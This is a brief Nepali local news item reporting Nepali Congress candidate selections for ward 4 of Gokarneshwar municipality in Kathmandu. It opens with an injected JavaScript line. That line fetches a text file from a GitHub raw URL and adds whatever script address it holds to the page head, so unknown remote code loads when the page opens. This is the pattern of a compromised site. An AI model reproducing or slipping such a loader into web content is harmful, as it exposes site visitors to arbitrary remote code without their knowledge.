;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
नेपाली काँग्रेस पार्टीबाट काठमाडौँ क्षेत्र नं ३ गोकर्णेश्वर नगरपालिका वडा नं ४ को वडा अध्यक्षमा ज्ञान कुमार श्रेष्ठले टिकेट पाएका छन् |
तेस्तै खुल्ला सदस्यमा राजेश श्रेष्ठ र कृष्ण श्रेष्ठ , महिला सदस्य मा रेखा बस्नेत श्रेष्ठ र दलित महिला सदस्यमा सुनिता परियार चयन हुनु भएको छ |
फेसबुक प्रतिक्रियाहरु